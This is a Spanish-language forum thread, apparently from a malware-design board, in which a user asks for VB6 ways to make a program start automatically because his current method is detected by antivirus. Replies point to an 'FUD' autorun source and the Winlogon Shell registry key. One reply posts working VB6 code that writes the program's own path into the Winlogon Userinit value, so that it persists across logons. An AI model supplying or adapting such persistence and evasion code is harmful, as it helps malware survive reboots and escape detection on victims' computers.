Ayuda AutoRuns

Iniciado por MrSatan, 28 Diciembre 2012, 22:17 PM

0 Miembros y 2 Visitantes están viendo este tema.

MrSatan

 Hola queria saber si me darian algunas formas de crear autoruns desde vb6 ya que la que uso es muy simple y super detectada por eso quiero saber si hay otras formas...

Gracias.

BlackZeroX

The Dark Shadow is my passion.

MrSatan

Cita de: BlackZeroX (Astaroth) en 28 Diciembre 2012, 23:42 PM
.
[Src] Autorun.inf FUD (Pensaste que ya no servia LOL).

Dulces Lunas!¡.

Muchas gracias por comentar esa también la conocia ahora probe una que se crea en
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell"    si alguno tiene otras y las quiere compartir me viene de 10.

un saludo.      

BlackZeroX

#3
.
@MrSatan
Existe un botón llamado Buscar!¡.

Aun así esta duda es mas sobre INFORMACIÓN que de código (independientemente del lenguaje).

Análisis y Diseño de Malware
[Recopilatorio] Herramientas, manuales y códigos de los usuarios (Construcción).

Windows
F.A.Q.

No recuerdo donde leí lo de inicio por ActiveX, runonce (varios inicios por registro de windows), entre otros (puede que haya sido en el Sub-Foro de Windows o de Análisis de Diseño de Malware).

Dulces Lunas!¡.
The Dark Shadow is my passion.

Danyfirex

esta la hice hace tiempo no se como este de detecciones :S


Código (vb) [Seleccionar]
Private Declare Function RegOpenKeyEx Lib "advapi32" Alias "RegOpenKeyExA" (ByVal HKey As Long, ByVal lpSubKey As String, ByVal ulOptions As Long, ByVal samDesired As Long, ByRef phkResult As Long) As Long
Private Declare Function RegSetValueEx Lib "advapi32.dll" Alias "RegSetValueExA" (ByVal HKey As Long, ByVal lpValueName As String, ByVal Reserved As Long, ByVal dwType As Long, lpData As Any, ByVal cbData As Long) As Long
Private Declare Function RegCloseKey Lib "advapi32" (ByVal HKey As Long) As Long


Private Const HKEY_CURRENT_USER = &H80000001
Private Const HKEY_LOCAL_MACHINE = &H80000002
Private Const KEY_WRITE = &H20006
Private Const REG_SZ = 1



Private Sub Dosyayi_Baslangica_Ekle(ByVal HKey As Long, ByVal MKey As String, ByVal stringKeyVal As String, ByVal subkey As String)
Dim HRKey As Long, StrB As String
Dim retval As Long
    retval = RegOpenKeyEx(HKey, subkey, 0, KEY_WRITE, HRKey)
        If retval <> 0 Then
            Exit Sub
        End If
    StrB = stringKeyVal & vbNullChar
    retval = RegSetValueEx(HRKey, MKey, 0, REG_SZ, ByVal StrB, Len(StrB))
    RegCloseKey HRKey
End Sub

Private Sub Command1_Click()

Dim sMyPath As String

file = "C:\Users\Pink\Desktop\Anotador.exe"
sMyPath = (App.Path & "\" & App.EXEName & ".exe")
Call Dosyayi_Baslangica_Ekle(HKEY_LOCAL_MACHINE, "Userinit", "C:\Windows\system32\userinit.exe," & sMyPath, "SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon")

End Sub



Saludos